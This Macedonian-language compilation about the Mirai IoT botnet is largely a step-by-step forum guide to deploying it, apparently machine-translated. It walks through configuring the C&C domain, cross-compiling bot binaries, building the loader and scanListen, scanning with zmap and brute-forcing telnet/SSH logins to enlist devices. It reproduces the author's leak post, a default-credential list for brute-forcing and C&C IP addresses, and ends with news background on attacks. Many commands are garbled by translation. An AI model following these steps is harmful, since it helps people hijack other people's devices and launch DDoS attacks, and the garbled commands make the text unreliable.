Изворниот код на Mirai. Инсталирање и конфигурирање на ботнетот Mirai. Како работи Мираи

Во суштина, Mirai работи едноставно: го скенира Интернетот барајќи IoT уреди кои се ранливи на брутална сила и хакирање, достапни преку телнет. Злонамерниот софтвер првенствено ги инфицира камерите за надзор, DVR и рутерите, а потоа продолжува да се размножува како црв.

Од DDoS напади извршени од овој ботнет неодамна и најголем во Европа. Врвната моќност на напад достигна 620 Gb/s и повеќе од 1 Tb/s. За да постигнат такви резултати, напаѓачите користеле UDP, DNS и HTTP поплави, како и GRE (Generic Routing Encapsulation) пакети, кои експертите ги препознале како многу необични.

Заклучоците на експертите на MalwareTech генерално се согласуваат со овие набљудувања. Така, во период од дванаесет часа, истражувачите снимиле околу 72.000 уникатни IP адреси, а секој час се појавувале 4.000 нови IP адреси. Од ова, аналитичарите заклучија дека големината на ботнетот е многу скромна - само околу 120.000 уреди дневно. И иако ботнетот е многу поголем и бројките се 1-1,5 милиони ботови, ниту истражувачите на MalwareTech ниту специјалистите на Akamai не се согласуваат со ова.

„Mirai, кој беше во голема мера игнориран во минатото поради едноставноста на телнет нападите, стана речиси главна тема на дискусија во медиумите ширум светот минатата недела, а агенциите за спроведување на законот започнаа истраги, со поддршка на многу меѓународни компании“, пишуваат истражувачите. „Многу е веројатно дека моќните DDoS напади ќе станат почести сега бидејќи хакерите пронаоѓаат сè повеќе ранливи IoT уреди или почнуваат да ги инфицираат NAT заштитените уреди. Дефинитивно е време производителите да престанат да објавуваат уреди со глобални стандардни лозинки и да се префрлат на ослободување на уреди со случајно генерирани лозинки на дното на куќиштето“.

Во прилог на извештајот, истражувачите на MalwareTech прикачија видео на кое е прикажана мапа на инфекции од Mirai (види подолу). Исто така, на веб-страницата на истражувачите, можете да најдете интерактивна мапа на ботнетот, која се ажурира во реално време.

Ќе ни требаат два VPS KVM сервери и домен. Виртуелизацијата до овој момент е KVM, OpenVZ.

Имам сервери овде -

На едниот сервер ќе го инсталираме самиот ботнет, на вториот ќе скенираме ботови. (брутално)

ВАЖНО. Серверите мора да бидат базирани на Debian 8 и да имаат најмалку 1GB RAM.

Било кој домен, не е важно.

Извинете, се разбира, но нема да ви кажам како да прикачите домен на VPS. Не е тешко, ќе сфатиш сам.

КИТи почнуваме.

# apt-get update -y

# apt-get надградба -y

# apt-get инсталирај отпакувај gcc golang електрична ограда на екранот sudo git -y

# apt-get инсталирај mysql-сервер -y

# apt-get инсталирај mysql-client -y

# apt-get инсталирај apache2 -y

Кога инсталирате MySQL, ќе треба да креирате лозинка за пристап до MySQL за root корисникот. Дојдете со нормална лозинка, без никаков „qwerty“

Запишете го некаде, сепак ќе ни треба.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y

#баш< <(curl -s -S -L

Мора да сте најавени за да ги видите врските.

# gvm инсталирај go1.4

# gvm користи go1.4 [--стандардно]

# gvm инсталирај go1.4 -B

# gvm користи go1.4

# извоз GOROOT_BOOTSTRAP=$GOROOT

# gvm инсталирај go1.5

# gvm користи go1.5

# gvm инсталирај go1.8

# gvm користи go1.8

Откако ќе ги инсталирате сите комунални услуги, преземете ги изворите на бот -

Мора да сте најавени за да ги видите врските.

И прикачете го на серверот. тим wget, или само преку програмата WinSCP.

# отпакувајте Mirai-Source-Code-master.zip

# cd Mirai-Source-Code-Master/mirai/tools

# gcc enc.c -o енц

# ./enc низа *******(го пишуваме нашиот домен, кој е прикачен на серверот) и притиснете Enter.

Овде ќе го видите следниот текст -

XOR содржи 14 бајти податоци...

\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22

14 - овде ќе имате друг број, затоа не грижете се, сè е точно.

Копирајте го целиот овој текст.

Отворете преку нано уредник или преку WinSCPдатотека табела.вшто се наоѓа во папката mirai/bot

Мора да се види ова -

Мора да сте најавени за да ги видите врските.

Линија додај_запис (TABLE_CNC_DOMAIN- се што е во наводници се менува во наш текст кој штотуку го препишавме. Наместо " 30 " го пишуваме нашиот број, кој исто така само го копиравме. Истото го правиме и со конецот додај_запис (TABLE_SCAN_CB_DOMAIN

Зачувајте го и затворете го уредникот.

Отворете ја датотеката со уредникот mirai/cnc/main.go

Го гледаме -

Мора да сте најавени за да ги видите врските.

"127.0.0.1" смени во "127.0.0.1:3306"

"лозинка"сменете ја нашата лозинка за MySQL што беше внесена претходно. "

Зачувајте ја датотеката и затворете го уредникот.

Само копирајте го сето ова ѓубре, нема да ви кажам зошто ви треба -

# mkdir /etc/xcompile

# cd /etc/xcompile

#wget

Мора да сте најавени за да ги видите врските.

#wget

Мора да сте најавени за да ги видите врските.

#wget

Мора да сте најавени за да ги видите врските.

#wget

Мора да сте најавени за да ги видите врските.

#wget

Мора да сте најавени за да ги видите врските.

#wget

Мора да сте најавени за да ги видите врските.

#wget

Мора да сте најавени за да ги видите врските.

#wget

Мора да сте најавени за да ги видите врските.

#wget

Мора да сте најавени за да ги видите врските.

# tar -jxf вкрстен компајлер-armv4l.tar.bz2

# tar -jxf cross-compiler-i586.tar.bz2

# tar -jxf вкрстен компајлер-m68k.tar.bz2

# tar -jxf cross-compiler-mips.tar.bz2

# tar -jxf cross-compiler-mipsel.tar.bz2

# tar -jxf вкрстен компајлер-powerpc.tar.bz2

# tar -jxf вкрстен компајлер-sh4.tar.bz2

# tar -jxf вкрстен компајлер-sparc.tar.bz2

# tar -jxf вкрстен компајлер-armv6l.tar.bz2

# rm *.tar.bz2

# mv вкрстен компајлер-armv4l armv4l

# mv вкрстен компајлер-i586 i586

# mv вкрстен компајлер-m68k m68k

# mv вкрстено компајлер-мипс мипи

# mv cross-compiler-mipsel mipsel

# mv cross-compiler-powerpc powerpc

# mv вкрстен компајлер-sh4 sh4

# mv вкрстен компајлер-sparc sparc

# mv вкрстен компајлер-armv6l armv6l

# извоз PATH=$PATH:/etc/xcompile/armv4l/bin

# извоз PATH=$PATH:/etc/xcompile/i586/bin

# извоз PATH=$PATH:/etc/xcompile/m68k/bin

# извоз PATH=$PATH:/etc/xcompile/mips/bin

# извоз PATH=$PATH:/etc/xcompile/mipsel/bin

# извоз PATH=$PATH:/etc/xcompile/powerpc/bin

# извоз PATH=$PATH:/etc/xcompile/powerpc-440fp/bin

# извоз PATH=$PATH:/etc/xcompile/sh4/bin

# извоз PATH=$PATH:/etc/xcompile/sparc/bin

# извоз PATH=$PATH:/etc/xcompile/armv6l/bin

# извоз PATH=$PATH:/usr/local/go/bin

# извоз GOPATH=$HOME/Documents/go

# оди земи github.com/go-sql-driver/mysql

# оди земи github.com/mattn/go-shellwords

# cd Mirai-Source-Code-master/mirai

# ./build.sh дебагира телнет

# ./build.sh ослободување на телнет

# mv mirai* /var/www/html

# cd /var/www/html

# mkdir канти

#mv*bins/

Сега MySQL.

# mysql -u root -p

Овде ќе ви биде побарано лозинка. Внесете ја лозинката што претходно сте ја поставиле.

# креирај база на податоци mirai;

#користи мираи

Сега копирајте го целиот текст од овде -

Мора да сте најавени за да ги видите врските.

Залепете и притиснете Enter.

Копирај текст од овде -

Мора да сте најавени за да ги видите врските.

Наместо ана-сенпаинапишете го вашето најавување. Било кој. Истото со myawesomepassword. Ќе ни требаат овие податоци за да пристапиме до контролната табла на бот.

Треба да биде вака - ВНЕСЕТЕ ВРЕДНОСТИ ВО корисниците (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");

Копирајте, залепете, притиснете Enter.

Сега можете да излезете.

Речиси се.

# cd Mirai-Source-Code-master/mirai/release

# допир prompt.txt

# екран ./cnc

Знак мора да се види Отворена е MySQL DB

Не ја затворајте оваа сесија, отворете нова.

Мора да сте најавени за да ги видите врските.

Наместо ****** го пишуваме нашиот домен и кликнуваме Отвори.

Внесете го вашето корисничко име и лозинка, во мојот случај тоа е -

заебалсјаписатј

Сè, ние сме во контролната табла на бот.

Сега ни требаат ботови. Сè е едноставно овде, не се потребни никакви инсталации.

Поставете натоварувач.

Потребен е подигнувач за да може да се додаваат ботови од текстуални датотеки. Да речеме дека сме хакирале многу уреди (рутери, камери, телефони) и за да ги додадеме во ботот, потребен ни е подигнувач.

Исто така, натоварувачот е „црв“

Поврзување со нашиот сервер преку PuTTY и WinSCP.

Користејќи WinSCP пронајдете ја датотеката главен.вво папка mirai-source-code-master/dlr

Ја пишуваме IP адресата на нашиот сервер како на сликата од екранот -

Мора да сте најавени за да ги видите врските.

Ги оставаме запирките како што треба. Зачувај и затвори.

Сега со PyTTYодете на нашиот сервер и напишете -

# cd Mirai-Source-Code-master/dlr

# chmod 777 *

# ./build.sh

# ЦД издание

# mv dlr* ~/Mirai-Source-Code-master/loader/bins

Сега да отвориме WinSCPи пронајдете ја датотеката главен.вво папка mirai-source-code-master/loader/src

Променете ја вашата IP адреса како на екранот -

Мора да сте најавени за да ги видите врските.

Зачувај и затвори.

Преку КИТ -

# ./build.sh

Со користење на WinSCPотворена датотека scanListen.goшто може да се најде во папката mirai-source-code-master/mirai/tools

Променете ја IP адресата на вашиот сервер -

Мора да сте најавени за да ги видите врските.

Потоа со PyTTY -

# cd Mirai-Source-Code-master/mirai/tools

# оди изгради scanListen.go

Сега имаме нова датотека - скенирајте Слушајте(без .оди, Само скенирајте Слушајте)

скенирајте Слушајтетреба да се премести во папката mirai-source-code-master/loader

Само со користење WinSCPставете го во папка натоварувач

Сега да провериме дали сè работи

# ./натоварувач

Ако видите што е на екранот, тогаш сè е точно -

Мора да сте најавени за да ги видите врските.

Ако има грешки пиши во темата ќе помогнам.

За да преземете ботови од списокот, фрламе текст во папка натоварувачи ја собираме командата -

# листа на мачки.txt | ./натоварувач

Сè, сите ботови што сте ги хакирале ќе бидат со вас, тие ќе поставуваат страници по ваша команда.

Јас лично не го користев овој метод, најдов полесен начин.

Тука ни треба втор сервер. Исто на Дебиан 8.

# apt-get update -y

# apt-get надградба -y

# apt-get инсталирај python-paramiko -y

# apt-get инсталирај zmap -y

zmapтреба да ги скенираме портите. Принцип на работа како KPortScan, само 50 пати побрзо.

Копирајте го целиот код од овде -

Мора да сте најавени за да ги видите врските.

И зачувај како скенирајте.py

Овде можете да ги додадете вашите лозинки и најавувања -

Мора да сте најавени за да ги видите врските.

низа комбинацијане допирај!

Тука треба да ја регистрирате IP адресата на серверот на кој се наоѓа ботот -

Мора да сте најавени за да ги видите врските.

Променете сè и зачувајте.

Ја фрламе датотеката scan.py каде било на нашиот сервер. На вториот сервер, кој е чисто за скенирање, тој на кој не го допираме ботот.

Ни требаат IP-адреси што ќе ги скенираме.

#zmap -p22 -o list.txt -B 100M(можете да скенирате и други порти, јас секогаш скенирав 22 или 23)

Сите резултати ќе бидат во датотеката листа.txt

По собирањето на IP датотеката (колку повеќе толку подобро). листа.txtфрли до датотеката скенирајте.pyи пиши -

# python scan.py list.txt 500

Тоа е тоа, седиме и гледаме како расте нашиот ботнет.

Кога ќе се напишете најмалку 200 ботови, можете да го вклучите подигнувачот.

За да го направите ова, одете на серверот каде што е инсталиран ботнетот и -

# cd Mirai-Source-Code-master/loader

# улмит -n 9999999

# ./scanСлушај | ./натоварувач

Сега ботот ќе работи како „црв“ и ќе заврши со повеќе ботови.

Минатата недела на мрежата протекоа изворите на компонентите на ботнетот Mirai, кој се користеше во рекордни DDoS напади со капацитет до 1 Tb/s.

чл. 273 од Кривичниот законик на Руската Федерација. Креирање, користење и дистрибуција на малициозни компјутерски програми

1. Создавање, дистрибуција или употреба на компјутерски програми или други компјутерски информации, свесно наменети за неовластено уништување, блокирање, менување, копирање на компјутерски информации или неутрализирање на средства за заштита на компјутерски информации, –

ќе се казни со ограничување на слободата до четири години или со задолжителна работа во траење до четири години или со лишување од слобода за истиот период со парична казна во износ до 200 илјади рубли или во висина на платата или платата или кој било друг приход на осуденото лице за период до осум месеци.

2. Делата од ставот 1 на овој член, извршени од група лица по претходен договор или од организирана група, или од лице кое ја користи својата службена положба, како и предизвикување голема штета или извршени од себичен интерес, -

ќе се казни со ограничување на слободата до четири години или со принудна работа во траење до пет години, со или без лишување од слобода до пет години, со или без парична казна во износ од 100.000 до 200.000 рубли или во износ од плата или три години за консултантски приход или плата.

3. Делата од ставовите еден или два на овој член, ако предизвикале тешки последици или создале закана за нивно настанување, -

ќе се казни со лишување од слобода до седум години.

Овој ботнет главно се состои од камери, уреди за DVR итн.

Инфекцијата е прилично едноставна: Интернетот се скенира за отворени порти 80/23 (веб/телнет) и се избираат сметки со тврд код.

Малкумина од корисниците ги менуваат лозинките на вградените сметки (ако е можно), така што ботнетот постојано се ажурира со нови уреди. Ако можете да ја смените лозинката од веб-интерфејсот додека сте во него, тогаш лозинката и самото присуство на телнет-пристап едноставно ги избегнува многу корисници.

Најчесто користени сметки се:

овозможи: систем
школка: ш
админ: админ
корен: xc3511
корен:vizxv
корен: админ
корен: xmhdipc
корен: 123456
корен: 888888
поддршка: поддршка
корен: 54321
корен: juantech
корен:анко
корен: 12345
админ:
root: стандардно
админ: лозинка
корен: корен
корен:
корисник: корисник
admin:smcadmin
корен: помине
admin:admin1234
корен: 1111
гостин: 12345
корен: 1234
корен: лозинка
корен: 666666
админ: 1111
услуга: услуга
корен: систем
супервизор:надзорник
корен: klv1234
администратор:1234
корен: ikwb
корен: Zte521

По добивањето пристап, командниот центар добива бинарно известување за присуството на нов бот:

4a 9a d1 d1 = XXX.XXX.XXX.XXX (адресата на домаќинот беше тука)
05 = Таб
17 = 23 (порта 23 Телнет)
05 = Таб
61 64 6d 69 6e = корисничко име:admin admin
05= Таб
61 64 6d 69 6e = корисничка лозинка: админ

Компонентите на ботнет се дизајнирани да работат во различни средини, како што е потврдено од идентификуваните примероци:

мираи.рака
mirai.arm7
mirai.mips
mirai.ppc
мираи.ш4

Серверите за C&C во моментов се фиксирани на следните адреси:

103.1.210.27
103.1.210.28
185.130.225.65
185.130.225.66
185.130.225.83
185.130.225.90
185.130.225.94
185.130.225.95
185.70.105.161
185.70.105.164
185.93.185.11
185.93.185.12
200.170.143.5
46.249.38.145
46.249.38.146
46.249.38.148
46.249.38.149
46.249.38.150
46.249.38.151
46.249.38.152
46.249.38.153
46.249.38.154
46.249.38.155
46.249.38.159
46.249.38.160
46.249.38.161
80.87.205.10
80.87.205.11

Инструкциите за креирање ботнет се прилично едноставни, ги давам како што е (извор http://pastebin.com/E90i6yBB):

Поздравете ги сите,

Кога првпат отидов во DDoS индустријата, не планирав долго да останам во неа. Ги заработив моите пари, сега има многу очи кои гледаат во IOT, па време е за GTFO. Како и да е, го знам секој лизгач и нивната мама, нивен сон е да имаат нешто освен qbot.

Така, денес, имам неверојатно издание за вас. Со Mirai, обично вадам максимум 380k ботови само од телнет. Сепак, по Kreb DDoS, интернет провајдерите полека се гасеа и го чистеа својот чин. Денес, максималното повлекување е околу 300 илјади ботови и опаѓање.

Значи, јас сум твојот сенпаи и ќе се однесувам со тебе навистина убаво, мој хф-чан.

И на сите што мислеа дека прават нешто со удирање на мојот CNC, добро се изнасмеав, овој бот користи домен за CNC. Потребни се 60 секунди за повторно поврзување на сите ботови lol

Исто така, извикувајте на овој блог пост од malwaremustdie
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html<- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Имаше многу почит за тебе, мислеше дека си добар менувач, но навистина целосно и тотално не успеа да го преврти овој бинар. „Сè уште имаме подобар кунг фу од вас деца“ не ме насмејте ве молам, направивте толку многу грешки, па дури и помешавте некои различни бинарни датотеки со моите. смеење на глас

Да ти вратам неколку шамари
1) портата 48101 не е за назад поврзување, туку е за контрола за да се спречат повеќекратни случаи на бот да работат заедно
2) /dev/watchdog и /dev/misc не се за „одложување“, туку за спречување на системот да виси. Ова е ниско висечко овошје, толку тажно што сте крајно глупави
3) Не успеавте и мислевте дека FAKE_CNC_ADDR и FAKE_CNC_PORT се вистински CNC, lol „И правење на задна врата за поврзување преку HTTP на 65.222.202.53“. сте сопнале од протокот на сигналот ;) обидете се уште повеќе
4) Вашата алатка за скелет го цица газот, мислеше дека декодерот за напад е „синден стил“, но не користи ниту протокол базиран на текст? CNC и бот комуницираат преку бинарен протокол
5) велиш „chroot(“/“) толку предвидливо како торлус, но не разбираш, некои други убиваат врз основа на cwd. Покажува колку сте надвор од јамката со вистински малициозен софтвер. Врати се во Скидленд

Зошто пишувате алатки за обратен инженер? На прво место не можете ни правилно да се вратите назад. Ве молиме прво научете некои вештини пред да се обидете да ги импресионирате другите. Твојата ароганција во изјавувањето како ме „тепаше“ со твојата глупава кунг-фу изјава ме натера да се смеам толку силно додека го јадев мојот SO мораше да ме тапка по рамо.

Како што јас засекогаш ќе бидам слободен, така и вие засекогаш ќе бидете осудени на медиократија.

Барања
2 сервери: 1 за CNC + mysql, 1 за приемник за скенирање и 1+ за вчитување

Барања за ОП
2 VPS и 4 сервери
— 1 VPS со екстремно отпорен на куршуми за сервер за бази на податоци
- 1 VPS, rootkitted, за скенирање-приемник и дистрибутер
- 1 сервер за CNC (се користи како 2% процесор со 400k ботови)
- 3x 10gbps NForce сервери за вчитување (дистрибутерот подеднакво дистрибуира на 3 сервери)

— За да воспостават врска со CNC, ботови решаваат домен (resolv.c/resolv.h) и се поврзуваат со таа IP адреса
- Ботовите брутат телнет користејќи напреден SYN скенер кој е околу 80x побрз од оној во qbot и користи речиси 20x помалку ресурси. При наоѓање на брутиран резултат, бот решава друг домен и го пријавува. Ова е оковано во посебен сервер за автоматски да се вчита на уредите како што доаѓаат резултатите.
- Брутираните резултати стандардно се испраќаат на портата 48101. Услужната алатка наречена scanListen.go во алатките се користи за примање брутирани резултати (добивав околу 500 брутирани резултати во секунда на врвот). Ако градите во режим за отстранување грешки, треба да видите дека бинарната алатка scanListen се појавува во папката за отстранување грешки.

Mirai користи механизам за ширење сличен на само-повторување, но она што јас го нарекувам „оптоварување во реално време“. Во основа, ботови брутални резултати, испратете ги на сервер кој слуша со алатката scanListen, која ги испраќа резултатите до подигнувачот. Оваа јамка (brute -> scanListen -> load -> brute) е позната како вчитување во реално време.

Натоварувачот може да се конфигурира да користи повеќе IP-адреса за да се заобиколи исцрпувањето на портите во Linux (има ограничен број на достапни порти, што значи дека нема доволно варијации во торката за да се добијат повеќе од 65 илјади истовремени излезни врски - во теорија, оваа вредност е многу помалку). Би имал можеби 60k - 70k симултани излезни врски (истовремено вчитување) распоредени на 5 IP адреси.
Бот има неколку опции за конфигурација кои се заматени во (табела.c/table.h). Во ./mirai/bot/table.ч ти можешнајдете ги повеќето описи за опциите за конфигурација. Сепак, во ./mirai/bot/table.c има неколку опции што *треба* да ги промените за да работите.

- TABLE_CNC_DOMAIN - Име на домен на CNC за поврзување - Избегнување DDoS многу забавно со mirai, луѓето се обидуваат да го погодат мојот CNC, но јас го ажурирам побрзо отколку што можат да најдат нови IP-адреси, lol. Ретардирани :)
- TABLE_CNC_PORT - Порта за поврзување, веќе е поставена на 23
- TABLE_SCAN_CB_DOMAIN - Кога се пронаоѓаат брутирани резултати, овој домен е пријавен на
- TABLE_SCAN_CB_PORT - Порта за поврзување за брутирани резултати, веќе е поставена на 48101.

Во ./mirai/tools ќе најдете нешто што се нарекува enc.c - мора да го компајлирате ова за да излезете работи што треба да ги ставите во датотеката table.c

Извршете го ова во директориумот Mirai

./build.sh дебагира телнет

Ќе добиете некои грешки поврзани со тоа што вкрстените компајлери не се таму ако не сте ги конфигурирале. Ова е во ред, нема да влијае на компајлирањето на алатката enc

Сега, во папката ./mirai/debug треба да видите компајлиран бинар наречен enc. На пример, за да добиете заматена низа за име на домен за ботови да се поврзат, користете го ова:

./debug/enc string fuck.the.police.com
Излезот треба да изгледа вака

XOR има 20 бајти податоци…
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22
За да ја ажурирате вредноста на TABLE_CNC_DOMAIN, на пример, заменете ја долгата шестоаголна низа со онаа што ја дава алатката enc. Исто така, гледате "XOR' 20 бајти податоци". Оваа вредност мора добро да го замени последниот аргумент tas. Така, на пример, линијата table.c првично изгледа вака
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com
Сега кога ја знаеме вредноста од enc алатката, ја ажурираме вака

add_entry (TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x2", 2. //fuck.the.police.com
Некои вредности се низи, некои се порта (uint16 по мрежен ред / голем ендиан).
КОНФИГУРИРАЈТЕ ГО ЦПУ:
apt-get инсталирај mysql-сервер mysql-клиент

CNC бара база на податоци за да работи. Кога инсталирате база на податоци, одете во неа и извршете ги следните команди:
http://pastebin.com/86d0iL9g

Ова ќе создаде база на податоци за вас. За да го додадете вашиот корисник

ВНЕСЕТЕ ВРЕДНОСТИ ВО корисниците (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, ");
Сега, одете во датотеката ./mirai/cnc/main.go

Уредете ги овие вредности
const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "лозинка"
const DatabaseTable string = "mirai"
На информациите за mysql серверштотуку инсталиравте

Вкрстените компајлери се лесни, следете ги упатствата на оваа врска за да ги поставите. Мора да го рестартирате системот или повторно да ја вчитате датотеката .bashrc за овие промени да стапат на сила.

http://pastebin.com/1rRCc3aD
CNC, бот и сродни алатки:
http://dopefile.pk/a9f2n9ewk8om
Како да се изгради бот + ЦПУ
Во папката mirai има скрипта build.sh.
./build.sh дебагира телнет

Ќе излезе дебагирани бинарни датотеки на бот што нема да демонизираат и ќе отпечатат информации за тоа дали може да се поврзе со CNC, итн, статус на поплави итн. Се компајлира во папката ./mirai/debug
./build.sh ослободување телнет

Ќе произведува бинарни ботови подготвени за производство, кои се екстремно соголени, мали (околу 60K) кои треба да се вчитаат на уредите. Ги составува сите бинарни датотеки во формат: „mirai.$ARCH“ во папката ./mirai/release

Натоварувачот чита телнет записи од STDIN во следниот формат:
ip:portuser:pass
Открива дали има wget или tftp и се обидува да го преземе бинарното со тоа. Ако не, ќе ехо вчита мал бинарен (околу 1 kb) што ќе биде доволен како wget.
./build.sh

Ќе се изгради натоварувач, оптимизиран, производствена употреба, без гужва. Ако имате датотека во формати што се користат за вчитување, можете да го направите ова
catfile.txt | ./натоварувач
Запомнете да се ограничите!

Само за да е јасно, не давам никакви упатства за помош 1 на 1 или срање, премногу време. Сите скрипти и сè се вклучени за да се постави работниот ботнет за помалку од 1 час. Подготвен сум да помогнам ако имате индивидуални прашања (како тоа CNC не се поврзува со базата на податоци, го направив ова вака бла бла), но не прашања како „Мојот бот не се поврзува, поправете го“

Ова е тројанецот за кој сите пишуваа изминативе неколку недели. Од најимпресивните достигнувања на ботнетите создадени со помош на тоа - моќта на повеќе од терабит и во мала африканска земја.

Еве колку компјутери пороби за ова?

Воопшто не. Или барем многу малку. Уредите Target Mirai воопшто не се компјутери, туку IoT уреди - видео рекордери, камери, тостери... Според статистиката на Level 3 Communications, до крајот на октомври околу половина милион уреди биле под контрола на тројанецот.

И што, дали може да сними какви било камери со фрижидери?

Не навистина. Mirai е дизајниран за уреди базирани на Busybox - поедноставен сет на UNIX комунални услуги командна линија, кој се користи како главен интерфејс во вградените оперативни системи. Тројанецот напаѓа само одредени платформи, како што се ARM, ARM7, MIPS, PPC, SH4, SPARC и x86. Загрозени се само уредите со фабрички поставки или многу слаба заштита - инфекцијата се јавува со помош на напад со брутална сила на портата Телнет, за која се користи списокот со стандардни администраторски акредитиви.

Некако испаѓа дека е неефикасно - да бараш камери без лозинки низ цел Интернет - нели?

Но, тие не погодија. Новинар од Атлантик - изнајмил сервер, и напишал програма која се преправа дека е тостер. Првиот напад на „апаратот за домаќинство“ се случи по 40 минути! Во текот на следните 11 часа, тостерот бил хакиран повеќе од 300 пати. Факт е дека ботнетовите достигнаа невидени големини, а адресниот простор за IPv4 е многу мал за нив. Покрај тоа, вреди да се запамети дека хакерите не бараат ранливи уреди рачно - тоа го прават членовите на ботнетот. И, бидејќи секој новоконвертиран „работник“ самиот почнува да бара жртви, ботнетот расте експоненцијално.

Во геометриска прогресија? Односно, за една година ботнетовите ќе содржат трилиони уреди?!

Секако дека не 😀 Факт е дека бројот на IoT уреди е конечен. И ова е веќе доста итен проблем. Авторот на Mirai признава дека максималниот број уреди во неговата мрежа бил 380 илјади, а по неколку напади, кога корисниците и провајдерите почнале да преземаат заштитни мерки, бројот на уреди паднал на 300 илјади и продолжува да опаѓа.

Откако изворниот код на Mirai беше објавен во јавноста, сите и многу хакери почнаа да го користат. Во моментов, бројот на големи ботнети базирани на овој тројанец е околу 52. Вреди да се разјасни дека секој уред може да припаѓа само на една мрежа - веднаш по фаќањето на уредот, малициозниот софтвер го штити од повторна инфекција. Единствениот пат кога уредот може да ја промени сопственоста е кога уредот ќе се рестартира. Според експертите, по рестартирањето, уредот повторно ќе се зарази во рок од 30 секунди.

Значи, ефективноста на Mirai опаѓа?

Да. Хакерите се принудени да се натпреваруваат за ограничена количина на ресурси, којашто се намалува (поради мерките на претпазливост) наместо да расте. Ситуацијата дополнително се комплицира со фактот дека хакерите се крајно себични - така што, откако голем контролен сервер (Command and Control, C & C) на ботнетот едноставно беше исклучен - сега ботнетот се покажа бескорисен и неранлив на нови напади. Секој нова мрежаврз основа на Mirai ќе биде помал од претходните и ќе може да врши само напади со мала моќност. На пример, за време на изборите во САД беа направени слаби напади на веб-страниците на Клинтон и Трамп. Тие не направиле никаква штета, а никој воопшто не ги забележал (освен компанијата која конкретно ги следи дејствијата на овој тројанец).

Тоа е јасно. Што друго се знае за овој тројанец?

Тој е наследник на друг тројанец познат како Gafgyt, Lizkebab, BASHLITE, Bash0day, Bashdoor и Torlus. Вториот е познат по тоа што може да покори околу милион веб-камери, според истиот Комуникации на ниво 3. Исто така, познато е дека повеќето ботнети не користат чиста копија на Mirai, туку свои, модифицирани верзии (што е сосема очекувано).

Друга интересен факте дека корисниците на Runet пронајдоа руска трага во изворниот код на Mirai - во датотеката cnc/admin.go има излез од коментари на руски јазик:

cnc/admin.go: this.conn.Write(бајт(„\033))

Од друга страна, повеќе личи на шега - „проверувањето на сметките ...“ е очигледно трасирање (машински превод?) со „проверување сметки“.

Минатиот месец имаше напади на големи сајтови како Твитерили Spotify, кои привремено ги оневозможија. За ова се користеше ботнет. Мираи, обединувајќи 400-500 илјади уреди на Интернет на нештата. Сега новинарите на Motherboard дознаа дека двајца хакери успеале да ја преземат контролата врз ботнетот и да создадат нова негова верзија - тој веќе интегрира милион уреди. Неговата моќ ја доживеаја претплатниците на германскиот провајдер Дојче Телеком, чија мрежа беше во прекин минатиот викенд.

Лов на Мираи

Новинарите успеаја да разговараат со еден од овие двајца мистериозни хакери - тој го користи прекарот BestBuy. Во шифриран онлајн разговор, тој им кажал дека меѓу хакерите се развила вистинска борба за контрола на Мираи. Неодамна беше откриена ранливост во неговиот софтвер. Неговата употреба, заедно со брзината, може да им овозможи на BestBuy и неговиот партнер Popopret да ја преземат контролата над поголемиот дел од ботнетот и да го дополнат со нови уреди.

Претходно, нашите експерти го проучуваа кодот на ботнетот Mirai - се покажа дека тој не е создаден специјално за IoT уреди. Злонамерниот софтвер бара уреди поврзани на мрежата со стандардни најавувања и лозинки (admin:admin, root:password, итн.). Ова значи дека, теоретски, може да вклучи кој било уред, вклучувајќи домашни компјутери и сервери или рутери.

IoT уреди- обично рутери - се дел од ботнет Мираидодека не се рестартира - тогаш црвот се брише од нивната меморија. Сепак, ботнетот постојано го скенира Интернетот за ранливи уреди, за да може „излечен“ уред брзо повторно да стане дел од него. Постои вистинска трка меѓу хакерите кои први ќе заразат што е можно повеќе уреди.

Нема информации за тоа како креаторите на новиот Mirai успеваат да ги престигнат конкурентите. Сепак, тие им рекоа на новинарите дека користат сопствен ботнет за скенирање на потенцијално ранливи уреди, вклучувајќи ги и оние кои исто така претходно биле дел од ботнетот.

„Зошто да не го натерате Mirai да го лови Mirai и да го лапа оригиналот“, вели BestBuy.

Не само Мираи

Сепак, новиот ботнет не само што ги проголта старите уреди од Mirai и новите со стандардни лозинки. Неговите креатори исто така користат 0-дневни пропусти во фирмверот на IoT уредите. Експертите претходно предвидуваа скорешно појавување на такви „комбинирани“ ботнети.

Борбата против нив станува значително посложена - ако корисникот на крајниот уред треба само да ги промени корисничкото име и лозинката за да се соочи со самиот Мираи, тогаш тој нема да може сам да се справи со ранливостите на гаџетот.

DDoS на 700 Gbps

Хакерите на BestBuy и Popopret почнаа да ги рекламираат своите услуги - тие нудат пристап до нивните нова верзија Mirai испраќа спам пораки преку XMPP/Jabber,

Според хакерот, тие на клиентот му нудат неколку пакети на услуги. Поевтина вредност $2 000 - за овие пари клиентите можат да изнајмат од 20.000 до 25.000ботнет јазли за лансирање стражари во период до две недели со пауза помеѓу нападите од петнаесет минути. Зад $15 000 или $20 000 клиентите добиваат можност веќе 600.000 ботови да започнат двочасовни напади со 30 или 15 минути паузи. Во вториот случај, моќта на нападот ќе биде 700 Gbpsили повеќе.

перспективи

Безбедност IoT уредичесто е на прилично ниско ниво - ова се должи на фактот што продавачите често не се заинтересирани за воведување дополнителни мерки безбедност на информации. Тие ја рекламираат леснотијата на користење на нивните производи, а сите дополнителни мерки за безбедност на информациите наметнуваат ограничувања и бараат ресурси.

